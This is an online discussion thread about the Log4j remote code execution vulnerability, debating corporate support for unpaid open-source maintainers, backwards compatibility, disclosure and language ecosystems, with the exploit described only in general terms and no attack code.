If you want to help someone, give them cash. A blank check. Not "here's what I think would be helpful and now you should arrange to use it". Not a week at a penthouse, not a butler, not a private jet. Enough cash to pay for those things if they want them.


Just ask them. "What do you need to get this done and pushed out?" Then give them what they ask for. Listen instead of talking.


It isn't quite simple; when negotiating it is better to give cash. When donating it is better to give goods. Particularly if there is more than one person involved on the receiving side.

In this instance either would be reasonable.


I am not aware of a single circumstance in which donating goods is better than cash. What makes you think that?


You didn’t explain why it’s a perfect valid point It doesn’t seem reasonable for Johnson & Johnston at a valuation of 1/2 trillion to free load You are kind of talking about greater good, perhaps those charitable donations should go to medical research or homeless shelters rather than reducing the burden on for profit companies


The valid point is that too many cooks can spoil the soup. Mythical man month, if you will. Adding people who don't have the institutional knowledge to a software project even if they are rock stars at their own companies could do more harm inadvertently when trying to fix something time critical. So the additional proposal made here acknowledges that, and instead tries to remove as many non-work distractions and discomforts as possible for the people who CAN reliably fix this fast.


For sure, but what could be done is eliminating any non-superflous task so they can focus on resolving that specific problem.

Have a team handle all github issues and media inquiries. Another team focus on initially evaluating all incoming pull requests to check for egregious errors or applicability.

Only after making it through the gauntlet would the original maintainers need to read and/or respond to them.

Especially when such overwhelming public attention and pressure overtakes a relatively small team like this one.


There is still a risk that the kind of time required for the maintainers to have to get those teams up to speed on the project and how it works and what needs to be done could be just as much of a distraction. Adding more triage teams might be good in the future, but for now, adding more outsiders without proper context might just add stress.

As with openssl, what needs to be done is that these volunteers need to be given cash so this is more than just a volunteer project. If a particular corporate entity doesn’t want to sponsor some of the maintainers to work on it full time, then the project needs full-time sponsorship by the Linux Foundation, ASF or under the OpenJDK.


This explains how such a “solution” Benefits log4j and log4j users. The part I question from the start is why “google should” Vs “google should” pump the equivalent money into medical research vs “google should” make what is does better


When there's a disaster, there will be emergency responders from other jurisdictions lined up on the state lines as the commanders call to ask if assistance is needed.


This situation is fairly urgent, but I think you might not realize just how many people a CTO at one of these companies manages. There are going to be "OSS fires" more or less constantly so "some major OSS project has a bad vuln" is not the sort of thing that gets a CTO at a company like Google or Facebook out of bed. I've only seen this happen a very few times and they were for problems that were way more serious and complex.

But that is not to say that nothing is being done. At Google, at least, there are organized efforts staffed with plenty of people that are trying to solve the much much much bigger problem of "secure all of our open source dependencies and all future dependencies" rather than the individual problem of "secure this one dependency."

And PR? Google has been running projects like OSSFuzz for years and I haven't really seen it materialize as a large amount of positive PR, even in the tech community.


> And PR? Google has been running projects like OSSFuzz for years and I haven't really seen it materialize as a large amount of positive PR, even in the tech community.

Google's Project Zero is both very helpful and gets them A LOT of PR, both tech and mainstream.


GPZ isn't oncall for urgent bugfixes and, while a truly excellent project filled with great people, isn't the core team responsible for safe imported code.


> There are going to be "OSS fires" more or less constantly so "some major OSS project has a bad vuln" is not the sort of thing that gets a CTO at a company like Google or Facebook out of bed.

If all your IT projects have an RCE vulnerability that’s relatively easy to exploit, that should keep you up at night.


The RCE existed prior to this disclosure. If I can't sleep today, why should I have been able to sleep a week ago? The dirty secret is that an absolutely enormous amount of code is vulnerable and that the solution to software security is not "fix RCEs as they are discovered as fast as possible." If having RCEs keeps you up at night, then I don't believe that there is a single engineer at almost any company in the world that interfaces with the internet that should be able to sleep.

The actual solutions here are at a more abstract layer than individual vulns.


> The RCE existed prior to this disclosure. If I can't sleep today, why should I have been able to sleep a week ago?

A week ago, this vulnerability might have been known at most to a few three-letter agencies. Today, every two-bit script kiddie will be trying to exploit it. It's not hard to see how the situation has changed.


No, the fact of having these vulnerabilities is not a problem (I mean, obviously, but at the level you describe). The problem is having them be known to the world. Especially with a level of publicity like this.


As with earlier comments this seems to oversimplify the problem of throwing people at a problem. Adding people to a project puts more pressure on the current maintainers, to authenticate, validate, train and support newcomers.

Apache has processes for this, and project maintainers pointed people in that direction repeatedly (e.g. https://github.com/apache/logging-log4j2/pull/608#issuecomme..., https://github.com/apache/logging-log4j2/pull/608#issuecomme...).

The Apache foundation receives funding from a large number of organizations already: https://www.apache.org/foundation/thanks.html

Perhaps the right question to ask here is: what did Apache do to help their members in this event?

You can ask this question of the Apache foundation independently, without adding pressure on the project maintainers at this time.


I am guessing FANG engineers (and most engineers in general) would unanimously suggest "delete this ridiculous , ill-conceived JNDI integration ASAP. If people want JNDI integration, use a custom opt-in log4j appender. Don't let this shit be enabled by default". Yet that may not sit well with the log4j folks.


Log4j taking user input to run and execute code is crazy. You don’t think it “sits well”?


This is almost laughably naive. The irony is that you are criticizing poor IT leadership, by offering a suggestion that is beyond poor.

"Let's get 3 of your best guys in touch with the guys over at log4j...."

As if you can just wire up some engineers to reach out to each other on unrelated projects and magic will happen.


Throwing new people who never seen your project at the mainteners during critical situation will just slow them down.

Adding random new people generally does not immediately speeds up the process, but it is actively harmful in the middle of crisis.


> I mean, are you willing to spend your weekend working around the clock to fix my problems?

Surely the difference is you are getting paid, and if your boss says, help these guys out, you can do it? As opposed to some guys with jobs who have a project on the side. The big guys could even do something like offer to pay the maintainers and maybe they can take leave or something.

I agree with both sentiments. The big guys are under no obligation to fix an issue in some library they happen to use. But the log4j guys are under even less obligation when they do it in their spare time.

Everyone should enjoy their weekends.


> Surely the difference is you are getting paid, and if your boss says, help these guys out, you can do it?

No, I'm not getting paid. What leads you to believe in that? My targets are defined yearly and are very well defined, and patching random FLOSS projects is not one of them. And what leads you to believe that others, such as my boss, don't have their own milestones to meet, and instead take random FLOSS requests from random people on the internet?

A FANG is not a magical entity where any engineer can drop everything they're doing at the drop of a hat to work on external projects, let alone one whose only possible outcome is at best total indifference and at worse we get the company to own a problem affecting everyone for no reason whatsoever.


I'm not under the impression that GP means to suggest you personally have any obligation to donate time to OSS by virtue of being an employee at a large company.

Something I believe we agree on is that it is in the interest of large tech companies to spend time fixing critical security bugs in their own programs, regardless of who originally wrote the malfunctioning code and for whom said code was written.

One way to fix those bugs would be to create a patch for the external OSS library in instances where such a library is the origin of the vulnerability. This is especially practical when that library is used heavily as a basic piece of the company's common software development framework.

GP appears to be arguing that these patches should be upstreamed instead of simply being maintained internally until the bug is patched by someone else in the OSS community.


I think that what throwaway is saying, perhaps without trying to do so, is that you can't expect people in a FANG to care about the best interest of their employer, not if there are metrics set up that don't reflect the interest in question. You can't pay six figures salaries and expect to find people without razor sharp focus on personal gain.


I really don't understand why you are defining this as a random, external project. Your software is dependent on this project! It's right in the term "dependency"!


> A FANG is not a magical entity where any engineer can drop everything they're doing at the drop of a hat to work on external projects

If all our projects suffer from a known RCE vulnerability, I’m fairly certain my boss will be happy for me to drop everything to get it resolved.

That’s not nearly at FAANG, but it’s certainly not an undue burden on the schedule.


I’m not suggesting you donate time. I’m suggesting that if a large company depends on open source projects, it may be in their best interests to either use some engineering resources to help out those projects, i.e their engineers would do it as part of their job, or to spend their money on the maintainers of those projects.

If the big guys don’t want to do that, fair enough. But the open source maintainers are not under any obligation to work to anyones time lines either.


> You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would (...) mitigate the problems.

Your "(...)" elides the word "help," which completely changes the meaning of the quote, and your reply is constructed uncharitably as if that word wasn't in the original statement.


Somehow, I find what you are saying here to be totally unplausible.

> Log4j's maintainers have a far more difficult and challenging job than FANGs

You are saying that the companies that built advanced ML-based Chess/Go engines like Alpha Zero/Go can't solve a simple logging bug involving string substitution?

If your company ends up using the product in all your teams/project and products wouldn't it be in the company's interest to keep the product safe?

How do we know you're not a CTO/C--/manager in your 'faang' just taking this opportunity to bitch about how bad and unreliable open source is? You do have a track record when it comes to this.

> I mean, are you willing to spend your weekend working around the clock to fix my problems?

Wow, that's cynical even for a 'faang' dude.


same. my evenings and weekend are totally gone to put out this fire. which I wouldn't do if i wasn't obligated to


Speaking as an individual, of course you want to sit by the pool this weekend.

But as a professional representative of your org. surely you'll recognized the unsustainability of the situation and that it's far from ideal even in the pure self-interest of the company in question.


>> I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems.

Agreed, while reading it I also disagreed at this point:

>> the maintainers of log4j would have loved to remove this bad feature long ago, but could not because of the backwards compatibility promises they are held to.

Nobody is holding them to anything. If they want to remove an old feature, go right ahead. If those using it think it's that important they can fork the project and maintain it themselves. Oh right, that would take effort or money.


> Nobody is holding them to anything

I don't get this argument. Part of sharing your work is making sure what you put out is actually helpful to people. If they remove features people really like, then the library won't be as helpful - so it's perfectly fine for the OG devs to maintain this feature. The same thing with "scrambling" to fix - that could be because a sword is hanging over your head, or because you care about the people who use your work. Thinking this way, I can perfectly see them working hard to fixing this bug.


It is still a choice you make, do you want to be nice and do everything anyone asks of you ? Or stick to your principles and build only what you think is right?

Developers are social creatures like anyone else and like validation and recognition from peers, that is understandable but not an excuse.

It is no different from being able to say no when your boss ask you to build something you don't believe in or is against your morals, it is tough but our choice nonetheless.

Their choice then to support this feature, and now to patch it. They could have no either time, no point in complaining about it after making the choice.


>> Part of sharing your work is making sure what you put out is actually helpful to people.

No, people get to decide for themselves what is helpful to them. Assuming developers want to make the best tool they can, they still have to do so within the resource constraints they have. Dropping a feature or ignoring requests is part of that.


I understand it perfectly. Log4j is used in many Enterprise systems. Java is a fairly conservative language. Combine both together and you get much hesitancy to break backwards compatibility ingrained in the Java world.


Why not turn it off by default and feature flag it with an env variable?


Did they want to remove it because of security concerns?

If so, I really wouldn’t hold someone to any backwards compatibility promise if security is a concern.


My favorite way to dissect any open source issues:

How much you paid for it? Money back guaranteed. If you paid $0 then it you are guaranteed to get $0 money back in the case of an issue.


Are data breaches actually treated as all that seriously? For all the talk about cyber security, there seems to generally be little investment. It appears to be viewed as more of a reputational concern than an operational one.

A past organization of mine had a data breach (the kind that ended up making the news everywhere). A few people left (probably making it worse with all the turnover there), but I would be surprised if anything really changed in that organization.


If the company is in healthcare or finance, yes. Otherwise the typical answer is no. Most companies just load up on cyber insurance and call it a day. That said, reputational concern, is a big thing for companies. Take Dropbox for example. Early on they suffered several security breaches, and had a bad reputation around security. They've since built out a fairly large security program, in part because bad security can block deals, especially in the enterprise space.

I'll note that there's been more investment in security the last 4-5 years. Most B2B companies do a SOC2, and early on, so there tends to be a baseline of competence.


A data breach isn't the primary concern here. This exploit allows full pwnage of a system and could take down entire networks for as long as it takes to rebuild them.


This is not really about data breaches. The first widely spread automated attacks seem to drop cryptominers, however, we should expect that (if it's not already happened) within a week or so this will get used as the entry point for ransomware attacks, since it gives attackers a solid way of getting of code execution into company servers for anyone who has not solved this issue.


> I'm still flabbergasted that the original maintainers are rushing around trying to patch these problems.

If the RCE had been responsibly disclosed instead of via tweets and PR comments, maybe there wouldn't have had to be so much scrambling. And indeed maybe ASF could have found corporate OSPOs to help with remediation.

There are lots pixels being spilled on how the users of open source software should be paying for it (?), but I haven't seen much criticism of the vulnerability not being responsibly disclosed.


to the best of my knowledge it was discovered via a minecraft exploit and I don't think minecraft players are generally the "responsible disclosure" kinda people.


TBH it’s also quite mind boggling that this level of an RCE was used to hack Minecraft servers of all things.

I wonder if this wasn’t intended for something bigger and they just got caught when testing this out in the field.


Minecraft servers were one part of it... Minecraft clients where another.

If you sent a message to everyone with a client (that logged that message), everyone with a client would at least ping back to the ldap server.

The issue where this was introduced was: https://issues.apache.org/jira/browse/LOG4J2-313

That's from 2013 (Minecraft was 2 years old then) On the other hand, nothing with it really happened until someone asked if it was a security vulnerability - https://github.com/apache/logging-log4j2/pull/608#issuecomme...

And then all hell broke loose.

Simply said, this was a feature that was intended to make it easier for one company to use their structure with ldap lookups for where/how to log. The author of the change did what many people encourage others to do when working with open source "here's some code that I wrote, I'm contributing it back upstream."

If this was part of something "bigger", it sat quiet for the better part of a decade.


Wow, that’s a scary read…

No consideration, no discussion, no security analysis, just “JDNI is cool, can I hav plz? Ofc!”

Did none of these people consider what JDNI is designed to do?

Did none of these people consider what side-effects are appropriate within a logging library?


Yes... but... realize that log4j2 was in beta releases at the time, being maintained by one developer as part of a "I want to redesign how it works".

As an open source developer working on a project that hadn't even been formally released, I'd be quite pleased to have someone else contributing the features that they found useful back upstream in an effort to make it a better project.

Yes, this is what jndi is supposed to do. Was it done as best as it could be? Probably not. But it isn't something that's only in log4j2

http://logback.qos.ch/manual/loggingSeparation.html#ContextJ...

https://dennis-xlc.gitbooks.io/the-logback-manual/content/en...

But I'm not going to fault a solo developer of some beta software in the world of 2013 for not rejecting a patch because every angle wasn't thought out.


Considering that Minecraft players have built functional computers in-game using redstone circuits, it's not surprising to me at all. Minecraft tends to attract folks who have an eye for detail, and a passion for figuring out how things work (a.k.a. hacking).


Or they didn't know what they had. People spend a surprising large amount of time trying to cheat at video games. They could have stumbled onto it in this context without realizing the much larger picture.


yeah it's nuts. I wonder what the upper limit on a responsible disclosure bug bounty would have been(of course who would pay that is the question because it's an opensource project with a few maintainers) vs. the nation or underground price. This has been described as a once in a decade RCE.


A huge demographics play Minecraft. Kid of silly to make a generalization like that.


There’s no hiding something this easily exploitable. This isn’t rowhammer or spectre where you need a degree to understand it. Copy and paste this in and that’s it. It would have never survived “responsible disclosure”


From my reading of it, it was (12 days ago) "here's a pull request to remove a feature." And for a bit over a week it went through the normal process and got merged into the code 7 days ago.

Then three days ago someone asked "Is it a security vulnerability" and then everything happened.

This wasn't any great "there's a security bug that needs to be patched yesterday" and then a fix and release but rather an after the fact, when looking at it, was it realized the scope of the issue.


I'm not sure about Amazon but Google project's zero and openfuzz teams seem to be doing a lot of good work when it comes to open-source security -- more would be nice always

Personally I'd like something like a security health card/metric on opensource libaries that we could tie into CI systems/pull requests or something

in the past there were so few libarries it wasn't as daunting

I'd be able reason about stuff like libpng, libttf ..etc and think about them or even support them but now some projects are massive hodgepodges of thousands upon thousnads of packages


I knew you're deliberately exaggerating but isn't it a little bit over the top?

That ("...private jets..") doesn't happen because the solution isn't exactly the hard part, and the unpaid original maintainers are doing them anyway.


I admit to a certain level of exaggeration but, at the same time, we are talking literal peanuts to a large company. They could spend a million dollars and it'd be a rounding error on their balance sheet.

In all seriousness, taking actions like I identified above would cost the companies virtually nothing but result in huge long-term benefits by signaling to the rest of the open source world that "we love your work and will be right beside you helping if the chips are down."

This is, of course, not a suitable compensation model for popular open source projects. Thats a separate conversation.

But it would at least be something.


The compensation model is the problem. It doesn't mesh well with the way corporations function. If you don't charge for your product or services, corporations have no standard mechanism for addressing that some other way.

Open source contracts essentially state that companies can use the product with no relevant obligations, so they do. The "huge long term benefit" you claim can't be reliably translated onto a balance sheet, so it isn't.

And when companies do get involved, it's often explicitly for their direct commercial benefit, like Amazon's ElasticSearch distribution.

There's also a race to the bottom aspect to it. If an open source package e.g. charges for commercial use, something more free is likely to replace it.


> The compensation model is the problem. It doesn't mesh well with the way corporations function. If you don't charge for your product or services, corporations have no standard mechanism for addressing that some other way.

FSF: Pardon me, here's a little process that encourages sharing so that everyone can...

Corporations: gnawing on a giant proprietary turkey leg Doesn't Mesh Well nom nom nom No Standard Mechanism nom nom nom

**

Corporations: yelling through a mouthful of turkey What in sam hell is Linux why does IBM have a billboard about Linux why don't we have Linux?

Underling: Sir that's open source, our standard licensing mechanism wouldn't...

Corporations: belching through a mouthful of turkey change the goddamned mechanism I want linux and pass me that mayo


> Pardon me, here's a little process that encourages sharing

But they're following the process. What the comment I replied to was saying was that they should go beyond it. I'm pointing out that the lack of standard processes for doing that is what prevents it from happening.

That's just the reality of the situation. Yelling at clouds isn't going to change that.


> I admit to a certain level of exaggeration but, at the same time, we are talking literal peanuts to a large company.

I'm not sure you understand what you are asking, and I'm kind of dumbfounded by the sense of entitlement of your request. You are expecting others like me to be forced to work weekends on a problem that doesn't concern me (because my service is already patched) for absolutely nothing in return, and instead risking owning a problem and the blame of not coming up with a one-size-fits-all magic bullet.

All downsides and absolutely no upside at all, for my employer and let alone for myself.

Let me ask you this: how much of your personal time did you invested in coming up with a fix for this vulnerability? And yet you feel entitled to demanding this from others?


You do realize that this issue wasn't discovered this morning, and indeed part of the point is that if it wasn't people in their spare time it could've been patched days ago, and you could've fixed all your services during the week? So you prefer working weekends to fix a delayed bug instead of devs being paid to help fix it for everybody during the working week?


> Usually (as per ASF rules) the team should wait 72 hours after creating a release candidate before publishing the release to give the community enough time to review and cast their votes. We are building consensus to shorten that window for this particular release, given its urgency.

from: https://github.com/apache/logging-log4j2/pull/608#issuecomme...

If you read more of the history of the release you'll find that additional vectors were found in the RC process that were also fixed.


if this was a difficult task to fix, maybe support to ensure the devs can properly focus on the task would be a valid thing. however, this sounded like something not very difficult to fix. it will take longer for all of the end users to deploy fixes in their envs that it took for the patch to become available.

molehill meet mountain.


This commentary is exactly the problematic commentary the authors were referring to in the quote that David included near the top of his article. You may not be being so directly brash about their state, but you still imply with added dramatic extension that the project is in some dire state. That's likely a significant overreaction. There's a feature in the project that leads to a security concern, making it fixable likely took a small number of hours, communicating and dealing with the drama is what has and would continue to take the time, as well as pushing back on a plethora of demands for "full review" or "you must travel outside of your home country so I feel comfortable again".

I poked some fun at the issue, because this is in many ways an amusing issue - a feature that would rarely be added in more recent times, but at the time it was introduced we as an industry considered the whole space differently. I'm sure the maintainers are having a tough time, and theres no need to point fingers at them, hell there's no need to point fingers at the implementor of the feature. It's a mistake in retrospect but that doesn't make anyone unworthy of respect.

The actions you identified make a lot of assumptions, some are exclusionary, some are potentially offensive: - not everyone lives in the same country - not everyone can travel on a whim - the developers don't need to be close to you or their customers unless they want to be. - the project is not in some dire state in need of "saving"

As an Apache project there is a foundation that can help organize funding, and so if there's a funding problem with the project the discussion should start there. Yes, open source at large is underfunded, but this isn't a standalone project on a personal git host. Apache has some (probably not enough) funding, but most importantly it has the industry contacts and relationships to do better here.

There's a problem with "doing better" though, which I rarely see come up in these conversations. There are lots of libraries, such as log4j, that don't necessarily need full time staff or full time funding. They need spurts of funding at key times, to handle the trickle of regular but infrequent patches, to roll releases periodically, and occasionally such as this to dedicate some significant time to handling an exceptionally rare event. What this requires, in my opinion, more than arbitrary dollars, is a slush fund of professional time sponsorship, for employers of key contributors to be ready to make space available during work hours for this work, without adding any more pressure to the situation. Depending on the situation this may or may not require additional funding, but for a healthy ecosystem finding ways to arrange for this, and helping employers be comfortable with it is the step necessary to address the wide scale problem of small to mid size projects burning people's personal time in unplanned ways.


If I misspoke or offended anyone it was certainly not intentional. The bulk of my comment was based on the linked tweet:

> "Log4j maintainers have been working sleeplessly on mitigation measures; fixes, docs, CVE, replies to inquiries, etc. Yet nothing is stopping people to bash us, for work we aren't paid for..."

I guess that sounded to me like a very small group of isolated volunteers struggling to handle a lot of press and attention along with demands from numerous loud users. I thought perhaps they could have benefited from having some additional support.

My apologies if I unintentionally offended.


I don't think that throwing a bunch of new people in a project will necessarily make dealing with the problem (code, doc, communication issues) less stressful for the maintainers involved.

Quite the opposite.

The only way you can make this be less stressful for the maintainers is for them to delegate it all to some corporation to handle and go shopping, but this effectively means they are no longer the maintainers of that project.

Surely there is the possibility that these million dollars are just donated to the maintainers as compensation for a prompt resolution, but I don't think that is so easy to pull off. CTO may have some staffing but paying large sums to external contractors on a short notice is not something easy to pull off in any large organization.

No. I think this whole line of reasoning doesn't resonate much with reality.


> No. I think this whole line of reasoning doesn't resonate much with reality.

Oddly enough, I hear the same thing from boss all the time.


For argument’s sake, at least, I don’t consider anything suggested here as definitively “over-the-top”. It may seem (or be) unrealistic in practice (for reasons I don’t know), but the suggestion is far from unconscionable— it may, in fact, be the lowest cost solution to what could cost mega-corps billions in current (and potential future) fines/liabilities. To the extent it sounds like an exaggeration, I think that embodies the point of the comment— there are some (almost unreconcilable) concerns that impact the interplay of corporations and open source development.


As you said, the solution isn't the hard part. The reason that large companies aren't deploying their own solutions for this issue isn't that their engineers engineers that are incapable of developing their own solutions, but because then they would have to carry that patch forever, and if a problem was found with their particular solution they would be on the hook for it.

And yes, I do think this, "but everyone else is doing the same thing so it isn't really our fault" attitude is a problem.


> You'd think, in the spirit of open source, these multi-billion dollar companies--like Apple and Google and Amazon--would recognize the danger and immediately divert the best engineers they had to help this team identify and mitigate the problems.

Google doesn't even use log4j. What are you talking about? The spirit of open source does not dictate that the richest companies automatically shoulder the burden of maintenance of projects they do not even use. Google already has initiatives like Summer of Code that help open source projects it does not use, and I think it's perfectly fine to draw the line there.

> divert the best engineers they had

So the lessons from the mythical man-month are forgotten here. At this point I don't think adding more manpower helps.


Google voice was vulnerable to this, so I think this means they use log4j somewhere but I'm not an expert.


The Android SDK depends on log4j, so they definitely do use it.


What? It was already fixed. You just need to update. There's no need for the world's top fintech programmers to hack it out on a mountaintop somewhere.

Also, the reason the maintainers are rushing to fix it is: they're worried about losing "market share". Having been in open-source circles for a long time, maintainers care GREATLY about how many users they have. They just like watching their download stats go up every year. Even if it beings them no financial rewards. It's a sort of addiction.


> maintainers care GREATLY about how many users they have.

They do. Until they don't.

That inevitable day when they get yelled at in a github issue thread by a user who didn't bother reading the documentation, while staring at their kid in the living room playing video games and start wondering to themselves "why am I doing this hobby in my spare time again?"

Mild dopamine hits to affirmation-addicted programmers is not the sturdiest foundation upon which to build enterprise-grade software libraries.


Partly it is because it looks good on the resume, improves job prospects, help build a consulting business or get keynote offers or write books etc.

Many serious contributors eye all these aveneues to leverage their popularity, it is just not affirmation, it is also ability to monetize it


An influx of pull requests is also equally difficult for open source projects.

Anything sufficiently at scale needs a set of maintainers that the commercial tech companies would then collaborate with to get the PRs going.

Otherwise if everyone's just panicking and rushing to submit PRs, they'll inundate the maintainer. There's also no guarantee that even the best engineers at these companies are intimately familiar with the project, and might introduce regressions or other vulnerabilities in the process.

Anyway I do agree companies should be working with OSS devs, but it shouldn't be rushed or knee jerk. It should be collaborative and measured.


Great comment. I think this speaks to overall what’s happening in the world today.


> You'd think...these multi-billion dollar companies...would recognize the danger and immediately divert the best engineers they had to help this team identify and mitigate the problems.

For the general case, the problem is that a reporter might report the vulnerability to the open source project, then the project needs to keep it a secret while they make a fix. There isn't a great way to leverage these stakeholders. It's obviously different for something like Android that is open source, but clearly Google.


> They should have been buried in useful pull requests.

Drive-by pull requests during a highly visibile emergency are rarely useful.


True, but that thoughtfulness is not what is stopping major companies from contribution is it ?


This is a problem in open source: everybody wants the fruits of labor without paying for it. The log4j vulnerability is what happens when you don't pay for it.


That's right. It is open source and, when it breaks, you get to keep both pieces.


but being open source, you can pull out the crazy glue and stick them back together. if you feel generous, you can submit your crazy glue solution to the devs. if they like it, they can then make it part of the package.


On the other hand, I expect that most people running log4j didn't know about or want this feature. What should they pay for something they don't want?

Maybe it makes more sense to fund system-wide efforts?


That's why I don't contribute to open source that is used by big corps. I don't like the idea of working for free for the benefit of billionaires.


You give away your work with a price tag of $0. So people/companies pay $0 for it. What’s hard to understand about that?


> What does backwards compatibility mean to me?

> I want to not spend much time upgrading a dependency

> Go compatibility promise:

>So whenever a change in behavior happens in an upstream library

You are comparing a promise from language designers to no promise from the library developers. Syntax from Oak (before Java was called Java) still compiles and works in Java 17 right now:

    jshell
   pub|  Welcome to JShell -- Version 17
   |  For an introduction type: /help intro
   jshell> public abstract interface I {}
   |  created interface I

You can still type (public abstract interface - all interfaces are abstract by default since Java 1) and it works. One of the reasons I gave up on writing desktop applications in Go was libraries were breaking compatibility with every commit. GTK+ binding was literary unusable as before gomod this would break literally, and I mean literally, every day.

Please tell me that none Go library had any breaking changes in the last 5 years and I'm using it as my default ecosystem from tomorrow.


What do you write desktop applications in these days?


To add some perspective, log4j has gone for 20 years with only two major versions. Assuming that they are following semantic versioning, that means they added new features/fixes in a backwards-compatible way and only broke compatibility _once_ in over two decades. That's both a testament to the stability of the library over time and a reminder that all the cruft accumulated over the years at most gets gated off through saner defaults.


Semantic versioning itself is substantially younger than 20 years.


Semantic versioning and similar variations have been used long before that term has been coined.


This assumption isn't true, though. APIs routinely get changed in minor versions, which can make it non-trivial to upgrade large codebases that use lots of features.


If breaking changes on an API are made in minor versions then they're not actually following semantic versioning.. and that's by choice.


Yes, they never claimed to be using semantic versioning so the assumption that they were using it is wrong.


> use lots of features.

That's the problem, you use log4j to log. Any 'feature' outside of that being used is wrong. Any 'feature' outside of that being implemented, is wrong.

If JNDI string interpolation is desired, write another module that does that.

I hate 'is-odd' but this is another extreme and demonstratably worse.


They put themselves between a rock and a hard place burning the major version number into the name of the library.

Changing the major version number as long it's accompanied by a well written release note on what needs to change seems fine.


I doubt anyone would have demanded retention of a feature where log _payload_ could cause the library to punch a connection to a server specified in the payload then _execute_ the response for any reason, never mind backwards compatibility.


If you had to have such a feature, it should never have been on by default, and the servers to be contacted should've been in a whitelist somewhere at a minimum.


*allowlist


By the way, what was the last time we experienced such catastrophic bugs in Python/Erlang/Ruby/Go... libraries? I think simplicity is deeply interconnected with security. Perfection comes from simplicity, and the choice of programming language can and will affect the security of your platform. Although I have to admit, bad engineering and over usage of libraries could happen in every environment, but Java technologies are unnecessarily complex compare to others tech stacks.


10 years ago, with DDOS attacks using hash table collision [1]. It was a sad Christmas, lot of RoR servers to patch.

[1] https://www.securityweek.com/hash-table-collision-attacks-co...


When a Javascript logging package has a vulnerability: "Why do you need a package for something so basic as logging? This should be part of JS core lib, or just roll your own."

When a Java logging package has a vulnerability: Sober introspection about the role of maintainers, dependencies, and backward compatibility in the OSS ecosystem.


Honestly speaking, nobody should be surprised by this. Javascript on the server is a daft pursuit, and shops that rely on it are continuously rolling the dice on their uptime anyway. Anyone can release a NodeJS package, and anyone can pick it up as a dependency.

Which is nominally true for Java. But Java enjoys the advantage of maturity. These things are supposed to have been foreseen. Java projects have a lot more resources thrown at them by their orgs, and there is a great deal of talent out there making sure all of this stuff is reliable.

This... caught that whole ecosystem off guard. Javascript devs have to always be on guard, because Javascript is the wild west. Nobody blissfully using and loving Javascript really understands why Javascript has so much trouble coming up with a standard library, but anyone who gets deep enough into Java understands very painfully why you just can't rely on it like you can Java.

Nobody starts asking sober, realistic questions when Javascript breaks because Javascript is always breaking.


There are different times, though. If you're going to roll a service in server-side Javascript at a large organization nowadays, it'll be tested to high heaven with modern CI/CD and rolling deploys, and this mitigates the fragility of applying security (or any other) updates significantly.

With Java, though, a lot of the services in production were made before this maturity was standard. There's a vast amount of software out there that's insufficiently tested and documented, some of which has dependencies as jar files included directly in the filesystem, and the relative stability of the Java library ecosystem led to a feeling that this was acceptable. It's difficult to even detect vulnerable services, much less upgrade them and trust CI to have your back. The reason this CVE is insidious is because it uniquely affects legacy software, often many layers removed from web interfaces, that was thought to be battle-tested.


Absolutely awful attitude to have. Javascript is not always breaking. Blaming failures of libraries on the language itself is ridiculous. Literally JS on the server is no more vulnerable to downtime than other langs.

Which is why its just a stupid to be angry with java regarding this.


Get far enough in your career and you realize ecosystems and history, and yes, language dynamics, matter. Javascript never had a module management system. It never had anything close to a strong type system. (at least python and ruby have strong type systems) All these things have to be grafted onto the language later and if you can understand the tyranny backwards-compatibility places a language under, you can understand the plight of NodeJS.

Don't get me wrong, NodeJS is improving... by implementing Ruby features.


> It never had anything close to a strong type system

Well yeah. It never claimed to have one.

You're blaming an ecosystem for being unstable, which while I agree, ultimately has nothing to do with the lang itself.

The fact we're discussing the fact one of the most simple libs of a language (logging to the console) can have such a widely felt exploit in such a 'mature' lang makes you're entire point very ironic.


> You're blaming an ecosystem for being unstable, which while I agree, ultimately has nothing to do with the lang itself.

It has everything to do with the language. With no built-in module support (until recently!) and a weak type system, it's virtually impossible for Javascript to get anywhere near the stability of Java.

> makes you're entire point very ironic.

OP made an observation that we're having this conversation for this particular Java vuln but Javascript breakage never provokes anything like this. I don't understand where the ironing is. <insert-Princess-Bride-gif>


These aren't conflicting beliefs. It's perfectly reasonable to believe that JavaScript has an inadequate standard library and recognize that other ecosystems can have dependency issues.


Yeah but one uses npm and the other maven.


So it's all glass houses?


Quite a reach going from the typical mockery of JavaScript that mostly refers to the left-pad fiasco, to saying logging is expected as a core library. No language I've used so far had a built-in logging library that was useful in every project.


> This is where software goes wrong the most for me. I want, year after year, to come back to a tool and be able to apply the knowledge I acquired the last time I used it, to new things I learn, and build on it. I want to hone my craft by growing a deep understanding of the tools I use.

This resonates with me deeply. Mastery of any subject needs a level of stability and permanence so that a skill base and a knowledge base doesn't erode away over time. Change is that erosive force, and we're so bad at knowing what changes to make in the software world.


> but complaints would have bubbled up to the Apache umbrella organization, which no doubt has plenty of Words written about "proper" versions, and the letter of rules would have been used to add heavily to their burden, while the spirit of compatibility is ignored.

Tailscale is wonderful software, but with all due respect I don't think David has much experience with Apache Foundation or Eclipse Foundation projects. I am a project lead of one (way smaller) Eclipse Foundation project and keep a close watch on another (bigger, but nowhere near the log4j scale) Apache Foundation project. We are free to make breaking changes (and make them we do). In both Foundations, there is a Project Management Committee that signs off on releases. They would normally raise an eyebrow if you try to push a breaking change into a patch release, but their reaction would normally be "why don't you bump the major version?".

Edit: there is indeed a social contract between the project leadership and the users. We have a social contract of supporting the oldest possible JVM for our project. Now some of our dependencies (guess what, that ASF project!) dropped Java 8 support and published a few CVEs since and we are going to move to JDK 11 as a baseline soon. Yes, some users are grumpy but people understand that unless someone forks that ASF project and starts backporting CVE fixes, we got to make the move. Bottom line: it's a much more social process than a bureaucratic one.


Hello. You're right that I have little experience with them, I've submitted code but never run a project. I believe I misread some commentary to convince myself of this. Paragraph removed. Thanks!

I suspect there is some kind of cultural pressure somewhere. Perhaps some of that comes from the versioning system, the maintainers are convinced they can't remove a feature without bumping a major version, and are simultaneously convinced they need to do a lot of work for others they don't have time to to bump the major version number? I believe neither statement should be true in reasonably run open source.


>but complaints would have bubbled up to the Apache umbrella organization

Like a thrown exception.


Sure, people who are making money building on FOSS tools should understand that they bear the burden of fitness for their environment. Maybe they do. If so, they've done a good job of deflecting attention.

Let me tell you a story about something that happened to me this spring. I had trouble logging in to my customer account at a critical infrastructure provider (utility provider). When I called customer support one thing led to another and they ended up reading me my password from their internal systems. (Let that sink in.)

